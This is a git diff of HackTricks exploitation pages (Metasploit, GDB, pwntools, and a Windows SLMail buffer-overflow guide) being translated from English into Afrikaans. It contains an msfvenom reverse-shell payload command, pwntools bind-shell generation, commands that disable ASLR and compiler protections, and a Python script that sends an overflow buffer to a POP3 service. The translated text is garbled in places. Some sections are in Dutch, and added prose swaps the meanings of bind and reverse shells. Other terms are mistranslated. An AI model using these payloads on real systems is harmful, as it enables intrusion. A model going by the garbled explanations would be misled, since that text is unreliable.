jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
# Metasploit - ``` pattern_create.rb -l 3000 #Length pattern_offset.rb -l 3000 -q 5f97d534 #Search offset @@ -24,72 +21,101 @@ nasm_shell.rb nasm> jmp esp #Get opcodes msfelfscan -j esi /opt/fusion/bin/level01 ``` +## Skulpe -## Shellcodes +'n Skulp is 'n klein stukkie uitvoerbare kode wat gebruik word in die uitbuiting van 'n sekuriteitskwesbaarheid om toegang tot 'n rekenaarstelsel te verkry. Dit is gewoonlik in masjienkode en word gebruik om 'n spesifieke taak uit te voer, soos die verkryging van beheer oor 'n stelsel of die uitvoering van 'n sekere funksie. +Skulpe word dikwels gebruik in die konteks van aanvalle soos bufferoorloopaanvalle, waar die aanvaller probeer om buite die grense van 'n toegewysde geheuegebied te skryf en sodoende die uitvoering van eie kode te bewerkstellig. Hierdie kode kan dan gebruik word om die aanvaller toegang tot die stelsel te gee, vertroulike inligting te steel of ander skadelike aktiwiteite uit te voer. + +Daar is verskillende tipes skulpe, insluitend bindskulpe en omgekeerde skulpe. 'n Bindskulp is 'n stukkie kode wat 'n verbinding met die aanvaller se stelsel vestig en die beheer oor die aangevalle stelsel oorneem. 'n Omgekeerde skulp daarenteen maak dit vir die aanvaller moontlik om 'n verbinding met die aangevalle stelsel te maak en dit vanaf sy eie stelsel te beheer. + +Die ontwikkeling van skulpe vereis 'n goeie begrip van masjienkode en die spesifieke stelsel waarop dit uitgevoer word. Dit is belangrik om te verseker dat die skulp korrek geoptimaliseer is vir die teikenstelsel en dat dit nie opgespoor of geblokkeer kan word deur sekuriteitsmaatreëls nie. ``` msfvenom /p windows/shell_reverse_tcp LHOST= LPORT= [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c ``` - # GDB -## Install +## Installeer +Om GDB te installeren, volg je de onderstaande stappen: + +### Linux + +1. Open een terminalvenster. +2. Voer het volgende commando in om GDB te installeren: + + ```bash + sudo apt-get install gdb + ``` + +### macOS + +1. Open een terminalvenster. +2. Voer het volgende commando in om GDB te installeren met Homebrew: + + ```bash + brew install gdb + ``` + +### Windows + +1. Download de GDB-installatiebestanden van de officiële website. +2. Voer het installatieprogramma uit en volg de instructies op het scherm. + +Zodra de installatie is voltooid, kun je GDB gebruiken om programma's te debuggen en te analyseren. ``` apt-get install gdb ``` - ## Parameters -**-q** --> No show banner\ -**-x \** --> Auto-execute GDB instructions from here\ -**-p \** --> Attach to process +**-q** --> Geen banner wysig\ +**-x \** --> Voer GDB instruksies outomaties uit vanaf hier\ +**-p \** --> Koppel aan proses -### Instructions +### Instruksies -\> **disassemble main** --> Disassemble the function\ +\> **disassemble main** --> Ontleed die funksie\ \> **disassemble 0x12345678**\ \> **set disassembly-flavor intel**\ -\> **set follow-fork-mode child/parent** --> Follow created process\ -\> **p system** --> Find the address of the system function\ +\> **set follow-fork-mode child/parent** --> Volg geskep prosesse\ +\> **p system** --> Vind die adres van die system funksie\ \> **help**\ \> **quit** -\> **br func** --> Add breakpoint to function\ +\> **br func** --> Voeg breekpunt by funksie by\ \> **br \*func+23**\ \> **br \*0x12345678**\ -**> del NUM** --> Delete that number of br\ -\> **watch EXPRESSION** --> Break if the value changes +**> del NUM** --> Verwyder daardie aantal breekpunte\ +\> **watch UITDRUKKING** --> Breek as die waarde verander -**> run** --> Execute\ -**> start** --> Start and break in main\ -\> **n/next** --> Execute next instruction (no inside)\ -\> **s/step** --> Execute next instruction\ -\> **c/continue** --> Continue until next breakpoint +**> run** --> Voer uit\ +**> start** --> Begin en breek in main\ +\> **n/next** --> Voer volgende instruksie uit (nie binne nie)\ +\> **s/step** --> Voer volgende instruksie uit\ +\> **c/continue** --> Gaan voort tot volgende breekpunt -\> **set $eip = 0x12345678** --> Change value of $eip\ -\> **info functions** --> Info abount functions\ -\> **info functions func** --> Info of the funtion\ -\> **info registers** --> Value of the registers\ -\> **bt** --> Stack\ -\> **bt full** --> Detailed stack +\> **set $eip = 0x12345678** --> Verander waarde van $eip\ +\> **info functions** --> Inligting oor funksies\ +\> **info functions func** --> Inligting oor die funksie\ +\> **info registers** --> Waarde van die registers\ +\> **bt** --> Stapel\ +\> **bt full** --> Gedetailleerde stapel -\> **print variable**\ -\> **print 0x87654321 - 0x12345678** --> Caculate\ -\> **examine o/x/u/t/i/s dir\_mem/reg/puntero** --> Shows content in octal/hexa/10/bin/instruction/ascii +\> **print veranderlike**\ +\> **print 0x87654321 - 0x12345678** --> Bereken\ +\> **examine o/x/u/t/i/s dir\_mem/reg/puntero** --> Wys inhoud in oktaal/heksadesimale/10/binêre/instruksie/ASCII * **x/o 0xDir\_hex** -* **x/2x $eip** --> 2Words from EIP +* **x/2x $eip** --> 2 Woorde vanaf EIP * **x/2x $eip -4** --> $eip - 4 -* **x/8xb $eip** --> 8 bytes (b-> byte, h-> 2bytes, w-> 4bytes, g-> 8bytes) -* **i r eip** --> Value of $eip -* **x/w pointer** --> Value of the pointer -* **x/s pointer** --> String pointed by the pointer -* **x/xw \&pointer** --> Address where the pointer is located -* **x/i $eip** —> Instructions of the EIP +* **x/8xb $eip** --> 8 byte (b-> byte, h-> 2 byte, w-> 4 byte, g-> 8 byte) +* **i r eip** --> Waarde van $eip +* **x/w pointer** --> Waarde van die wyser +* **x/s pointer** --> String wat deur die wyser aangedui word +* **x/xw \&pointer** --> Adres waar die wyser geleë is +* **x/i $eip** —> Instruksies van die EIP ## [GEF](https://github.com/hugsy/gef) - ```bash checksec #Check protections p system #Find system function address @@ -109,34 +135,32 @@ pattern search $rsp #Search the offset given the content of $rsp 1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it 2- ef➤ i f Stack level 0, frame at 0x7fffffffddd0: - rip = 0x400cd3; saved rip = 0x6261617762616176 - called by frame at 0x7fffffffddd8 - Arglist at 0x7fffffffdcf8, args: - Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0 - Saved registers: - rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8 +rip = 0x400cd3; saved rip = 0x6261617762616176 +called by frame at 0x7fffffffddd8 +Arglist at 0x7fffffffdcf8, args: +Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0 +Saved registers: +rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8 gef➤ pattern search 0x6261617762616176 [+] Searching for '0x6261617762616176' [+] Found at offset 184 (little-endian search) likely ``` +## Truuks -## Tricks +### GDB dieselfde adresse -### GDB same addresses - -While debugging GDB will have **slightly different addresses than the used by the binary when executed.** You can make GDB have the same addresses by doing: +Terwyl jy GDB foutopsporing doen, sal GDB **effens verskillende adresse hê as die een wat deur die binêre lêer gebruik word wanneer dit uitgevoer word.** Jy kan GDB dieselfde adresse laat hê deur die volgende te doen: * `unset env LINES` * `unset env COLUMNS` -* `set env _=` _Put the absolute path to the binary_ -* Exploit the binary using the same absolute route -* `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary +* `set env _=` _Plaas die absolute pad na die binêre lêer_ +* Exploiteer die binêre lêer deur dieselfde absolute roete te gebruik +* `PWD` en `OLDPWD` moet dieselfde wees wanneer jy GDB gebruik en wanneer jy die binêre lêer uitbuit -### Backtrace to find functions called - -When you have a **statically linked binary** all the functions will belong to the binary (and no to external libraries). In this case it will be difficult to **identify the flow that the binary follows to for example ask for user input**.\ -You can easily identify this flow by **running** the binary with **gdb** until you are asked for input. Then, stop it with **CTRL+C** and use the **`bt`** (**backtrace**) command to see the functions called: +### Terugvoetspoor om opgeroepde funksies te vind +Wanneer jy 'n **staties gekoppelde binêre lêer** het, sal al die funksies aan die binêre lêer behoort (en nie aan eksterne biblioteke nie). In hierdie geval sal dit moeilik wees om **die vloei te identifiseer wat die binêre lêer volg om byvoorbeeld vir gebruikersinvoer te vra**.\ +Jy kan hierdie vloei maklik identifiseer deur die binêre lêer met **gdb** te **hardloop** totdat jy gevra word vir invoer. Stop dit dan met **CTRL+C** en gebruik die **`bt`** (**terugvoetspoor**) bevel om die opgeroepde funksies te sien: ``` gef➤ bt #0 0x00000000004498ae in ?? () @@ -145,95 +169,88 @@ gef➤ bt #3 0x00000000004011a9 in ?? () #4 0x0000000000400a5a in ?? () ``` +## GDB-bediener -## GDB server - -`gdbserver --multi 0.0.0.0:23947` (in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine) +`gdbserver --multi 0.0.0.0:23947` (in IDA moet jy die absolute pad van die uitvoerbare lêer in die Linux-masjien en in die Windows-masjien invul) # Ghidra -## Find stack offset +## Vind stapelverskuiwing -**Ghidra** is very useful to find the the **offset** for a **buffer overflow thanks to the information about the position of the local variables.**\ -For example, in the example below, a buffer flow in `local_bc` indicates that you need an offset of `0xbc`. Moreover, if `local_10` is a canary cookie it indicates that to overwrite it from `local_bc` there is an offset of `0xac`.\ -_Remember that the first 0x08 from where the RIP is saved belongs to the RBP._ +**Ghidra** is baie nuttig om die **verskuiwing** vir 'n **buffer-oorvloei te vind danksy die inligting oor die posisie van die plaaslike veranderlikes.**\ +Byvoorbeeld, in die voorbeeld hieronder, dui 'n buffer-oorvloei in `local_bc` aan dat jy 'n verskuiwing van `0xbc` benodig. Verder, as `local_10` 'n kanariekoek is, dui dit aan dat daar 'n verskuiwing van `0xac` is om dit vanaf `local_bc` te oorskryf.\ +_Onthou dat die eerste 0x08 waar die RIP gestoor word, aan die RBP behoort._ ![](<../../.gitbook/assets/image (616).png>) # GCC -**gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Compile without protections\ -**-o** --> Output\ -**-g** --> Save code (GDB will be able to see it)\ -**echo 0 > /proc/sys/kernel/randomize\_va\_space** --> To deactivate the ASLR in linux +**gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Kompileer sonder beskerming\ +**-o** --> Uitset\ +**-g** --> Stoor kode (GDB sal dit kan sien)\ +**echo 0 > /proc/sys/kernel/randomize\_va\_space** --> Om die ASLR in Linux te deaktiveer -**To compile a shellcode:**\ -**nasm -f elf assembly.asm** --> return a ".o"\ -**ld assembly.o -o shellcodeout** --> Executable +**Om 'n skulpkode te kompileer:**\ +**nasm -f elf assembly.asm** --> Gee 'n ".o"\ +**ld assembly.o -o shellcodeout** --> Uitvoerbaar # Objdump -**-d** --> **Disassemble executable** sections (see opcodes of a compiled shellcode, find ROP Gadgets, find function address...)\ -**-Mintel** --> **Intel** syntax\ -**-t** --> **Symbols** table\ -**-D** --> **Disassemble all** (address of static variable)\ -**-s -j .dtors** --> dtors section\ -**-s -j .got** --> got section\ -\-D -s -j .plt --> **plt** section **decompiled**\ -**-TR** --> **Relocations**\ -**ojdump -t --dynamic-relo ./exec | grep puts** --> Address of "puts" to modify in GOT\ -**objdump -D ./exec | grep "VAR\_NAME"** --> Address or a static variable (those are stored in DATA section). +**-d** --> Ontbind uitvoerbare afdelings (sien opkode van 'n gekompileerde skulpkode, vind ROP-toestelle, vind funksie-adres...)\ +**-Mintel** --> **Intel** sintaksis\ +**-t** --> **Simbole**-tabel\ +**-D** --> Ontbind alles (adres van statiese veranderlike)\ +**-s -j .dtors** --> dtors-afdeling\ +**-s -j .got** --> got-afdeling\ +\-D -s -j .plt --> **plt**-afdeling **ontbind**\ +**-TR** --> **Herskikkinge**\ +**ojdump -t --dynamic-relo ./exec | grep puts** --> Adres van "puts" om in GOT te wysig\ +**objdump -D ./exec | grep "VAR\_NAME"** --> Adres van 'n statiese veranderlike (hierdie word in DATA-afdeling gestoor). -# Core dumps +# Kernaflewerings -1. Run `ulimit -c unlimited` before starting my program -2. Run `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t` +1. Voer `ulimit -c unlimited` uit voordat jy my program begin +2. Voer `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t` uit 3. sudo gdb --core=\ --quiet -# More +# Meer -**ldd executable | grep libc.so.6** --> Address (if ASLR, then this change every time)\ -**for i in \`seq 0 20\`; do ldd \ | grep libc; done** --> Loop to see if the address changes a lot\ -**readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system** --> Offset of "system"\ -**strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh** --> Offset of "/bin/sh" +**ldd uitvoerbare | grep libc.so.6** --> Adres (as ASLR, verander dit dan elke keer)\ +**for i in \`seq 0 20\`; do ldd \ | grep libc; done** --> Lus om te sien of die adres baie verander\ +**readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system** --> Verskuiwing van "system"\ +**strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh** --> Verskuiwing van "/bin/sh" -**strace executable** --> Functions called by the executable\ -**rabin2 -i ejecutable -->** Address of all the functions +**strace uitvoerbare** --> Funksies wat deur die uitvoerbare aangeroep word\ +**rabin2 -i ejecutable -->** Adres van al die funksies # **Inmunity debugger** - ```bash !mona modules #Get protections, look for all false except last one (Dll of SO) !mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP) ``` - # IDA -## Debugging in remote linux - -Inside the IDA folder you can find binaries that can be used to debug a binary inside a linux. To do so move the binary _linux\_server_ or _linux\_server64_ inside the linux server and run it nside the folder that contains the binary: +## Debugging in afgeleë Linux +Binêre lêers wat gebruik kan word om 'n binêre lêer binne 'n Linux te ontleed, kan binne die IDA-vouer gevind word. Om dit te doen, skuif die binêre lêer _linux\_server_ of _linux\_server64_ na die Linux-bediener en voer dit uit binne die vouer wat die binêre lêer bevat: ``` ./linux_server64 -Ppass ``` - -Then, configure the debugger: Debugger (linux remote) --> Proccess options...: +Stel dan die debugger in: Debugger (linux remote) --> Proses opsies...: ![](<../../.gitbook/assets/image (101).png>)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/exploiting/tools/pwntools.md b/exploiting/tools/pwntools.md index 8675450ff..eb927c514 100644 --- a/exploiting/tools/pwntools.md +++ b/exploiting/tools/pwntools.md @@ -1,133 +1,123 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - ``` pip3 install pwntools ``` - # Pwn asm -Get opcodes from line or file. - +Kry opcodes van 'n lyn of lêer. ``` -pwn asm "jmp esp" +pwn asm "jmp esp" pwn asm -i ``` +**Kan kies:** -**Can select:** +* uitvoertipe (rou, heks, string, elf) +* uitvoerlêerkonteks (16,32,64,linux,windows...) +* vermyt byte (nuwe lyne, nul, 'n lys) +* kies 'n enkoder om die shellkode te debugeer deur gdb die uitvoer te laat loop -* output type (raw,hex,string,elf) -* output file context (16,32,64,linux,windows...) -* avoid bytes (new lines, null, a list) -* select encoder debug shellcode using gdb run the output - -# **Pwn checksec** - -Checksec script +# **Pwn checksec** +Checksec-skrip ``` pwn checksec ``` - # Pwn constgrep -# Pwn cyclic - -Get a pattern +# Pwn siklies +Kry 'n patroon ``` pwn cyclic 3000 pwn cyclic -l faad ``` +**Kan kies:** -**Can select:** - -* The used alphabet (lowercase chars by default) -* Length of uniq pattern (default 4) -* context (16,32,64,linux,windows...) -* Take the offset (-l) +* Die gebruikte alfabet (standaard kleinletters) +* Lengte van unieke patroon (standaard 4) +* Konteks (16,32,64,linux,windows...) +* Neem die offset (-l) # Pwn debug -Attach GDB to a process - +Hef GDB aan 'n proses aan ``` pwn debug --exec /bin/bash pwn debug --pid 1234 pwn debug --process bash ``` +**Kan kies:** -**Can select:** - -* By executable, by name or by pid context (16,32,64,linux,windows...) -* gdbscript to execute -* sysrootpath +* Volgens uitvoerbare lêer, naam of pid konteks (16,32,64,linux,windows...) +* gdbskrip om uit te voer +* sysrootpad # Pwn disablenx -Disable nx of a binary - +Deaktiveer nx van 'n binêre lêer ``` pwn disablenx ``` - # Pwn disasm -Disas hex opcodes - +Ontbind heksadesimale opcodes ``` pwn disasm ffe4 ``` +**Kan kies:** -**Can select:** - -* context (16,32,64,linux,windows...) -* base addres -* color(default)/no color +* konteks (16,32,64,linux,windows...) +* basisadres +* kleur (standaard)/geen kleur # Pwn elfdiff -Print differences between 2 fiels - +Druk verskille tussen 2 lêers af ``` pwn elfdiff ``` +# Grys hex -# Pwn hex - -Get hexadecimal representation - +Kry die heksadesimale voorstelling ```bash pwn hex hola #Get hex of "hola" ascii ``` - # Pwn phd -Get hexdump +Kry hexdump +```python +from pwn import * + +# Verbind met die bediener +r = remote('example.com', 1337) + +# Kry die hexdump van die ontvangsdata +data = r.recv() +hexdump(data) +``` + +Die `hexdump`-funksie in `pwntools` kan gebruik word om die ontvangsdata in 'n hexdump-formaat te vertoon. Hier is 'n voorbeeld van hoe om dit te gebruik. Eerstens, maak 'n verbind met die bediener deur die `remote`-funksie te gebruik en die bediener se adres en poortnommer te spesifiseer. Dan, ontvang die data van die bediener deur die `recv`-funksie te gebruik. Laastens, gebruik die `hexdump`-funksie om die data in 'n hexdump-formaat te vertoon. ``` pwn phd ``` +**Kan kies:** -**Can select:** - -* Number of bytes to show -* Number of bytes per line highlight byte -* Skip bytes at beginning +* Aantal bytes om te wys +* Aantal bytes per lyn om te beklemtoon +* Slaan bytes aan die begin oor # Pwn pwnstrip @@ -135,70 +125,59 @@ pwn phd # Pwn shellcraft -Get shellcodes - +Kry skuldkodes ``` -pwn shellcraft -l #List shellcodes +pwn shellcraft -l #List shellcodes pwn shellcraft -l amd #Shellcode with amd in the name pwn shellcraft -f hex amd64.linux.sh #Create in C and run -pwn shellcraft -r amd64.linux.sh #Run to test. Get shell +pwn shellcraft -r amd64.linux.sh #Run to test. Get shell pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port ``` +**Kan kies:** -**Can select:** +* shellkode en argumente vir die shellkode +* Uitlêer +* uitvoerformaat +* foutopsporing (heg dbg aan shellkode) +* voor (foutopsporingsval voor kode) +* na +* vermy gebruik van opcodes (verstek: nie nul en nuwe lyn) +* Voer die shellkode uit +* Kleur/geen kleur +* lys stelseloproepe +* lys moontlike shellkodes +* Genereer ELF as 'n gedeelde biblioteek -* shellcode and arguments for the shellcode -* Out file -* output format -* debug (attach dbg to shellcode) -* before (debug trap before code) -* after -* avoid using opcodes (default: not null and new line) -* Run the shellcode -* Color/no color -* list syscalls -* list possible shellcodes -* Generate ELF as a shared library - -# Pwn template - -Get a python template +# Pwn sjabloon +Kry 'n Python-sjabloon ``` pwn template ``` - -**Can select:** host, port, user, pass, path and quiet +**Kan kies:** gasheer, poort, gebruiker, wagwoord, pad en stil # Pwn unhex -From hex to string - +Van heks na string ``` pwn unhex 686f6c61 ``` +# Pwn opdatering -# Pwn update - -To update pwntools - +Om pwntools op te dateer ``` pwn update ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md index f1d59b8f0..fc7c4ce68 100644 --- a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md +++ b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md @@ -1,33 +1,59 @@ -# Windows Exploiting (Basic Guide - OSCP lvl) +# Windows Exploiting (Basiese Gids - OSCP vlak)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-## **Start installing the SLMail service** +## **Begin met die installeer van die SLMail-diens** -## Restart SLMail service - -Every time you need to **restart the service SLMail** you can do it using the windows console: +## Herlaai SLMail-diens +Elke keer as jy die diens SLMail wil **herlaai**, kan jy dit doen deur die Windows-konsole te gebruik: ``` net start slmail ``` - ![](<../.gitbook/assets/image (23) (1).png>) -## Very basic python exploit template +## Baie basiese Python uitbuitingsjabloon +```python +#!/usr/bin/env python3 + +import socket + +# Verander hierdie waardes om die doelwit se IP-adres en poortnommer te spesifiseer +target_ip = "192.168.1.100" +target_port = 1337 + +# Skep 'n verbindingsobjek +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + +# Verbind met die doelwit +s.connect((target_ip, target_port)) + +# Stuur 'n uitbuitingsstring na die doelwit +exploit_string = b"Exploit string goes here" +s.send(exploit_string) + +# Ontvang die antwoord van die doelwit +response = s.recv(1024) +print(response.decode()) + +# Sluit die verbindingsobjek +s.close() +``` + +Hierdie is 'n baie basiese sjabloon vir 'n Python-uitbuiting. Jy kan die waardes van `target_ip` en `target_port` verander om die IP-adres en poortnommer van die teiken te spesifiseer. Vervang die `exploit_string` met die spesifieke uitbuitingsstring wat jy wil stuur. Die program sal die uitbuitingsstring na die teiken stuur en die antwoord ontvang en druk. ```python #!/usr/bin/python @@ -39,99 +65,89 @@ port = 110 buffer = 'A' * 2700 try: - print "\nLaunching exploit..." - s.connect((ip, port)) - data = s.recv(1024) - s.send('USER username' +'\r\n') - data = s.recv(1024) - s.send('PASS ' + buffer + '\r\n') - print "\nFinished!." +print "\nLaunching exploit..." +s.connect((ip, port)) +data = s.recv(1024) +s.send('USER username' +'\r\n') +data = s.recv(1024) +s.send('PASS ' + buffer + '\r\n') +print "\nFinished!." except: - print "Could not connect to "+ip+":"+port +print "Could not connect to "+ip+":"+port ``` +## **Verander Immunity Debugger-lettertipe** -## **Change Immunity Debugger Font** +Gaan na `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK` -Go to `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK` - -## **Attach the proces to Immunity Debugger:** +## **Koppel die proses aan Immunity Debugger:** **File --> Attach** ![](<../.gitbook/assets/image (24) (1) (1).png>) -**And press START button** +**En druk die START-knoppie** -## **Send the exploit and check if EIP is affected:** +## **Stuur die uitbuit en kyk of EIP geraak word:** ![](<../.gitbook/assets/image (25) (1) (1).png>) -Every time you break the service you should restart it as is indicated in the beginnig of this page. +Elke keer as jy die diens breek, moet jy dit herbegin soos aangedui aan die begin van hierdie bladsy. -## Create a pattern to modify the EIP +## Skep 'n patroon om die EIP te wysig -The pattern should be as big as the buffer you used to broke the service previously. +Die patroon moet so groot wees as die buffer wat jy vantevore gebruik het om die diens te breek. ![](<../.gitbook/assets/image (26) (1) (1).png>) - ``` /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 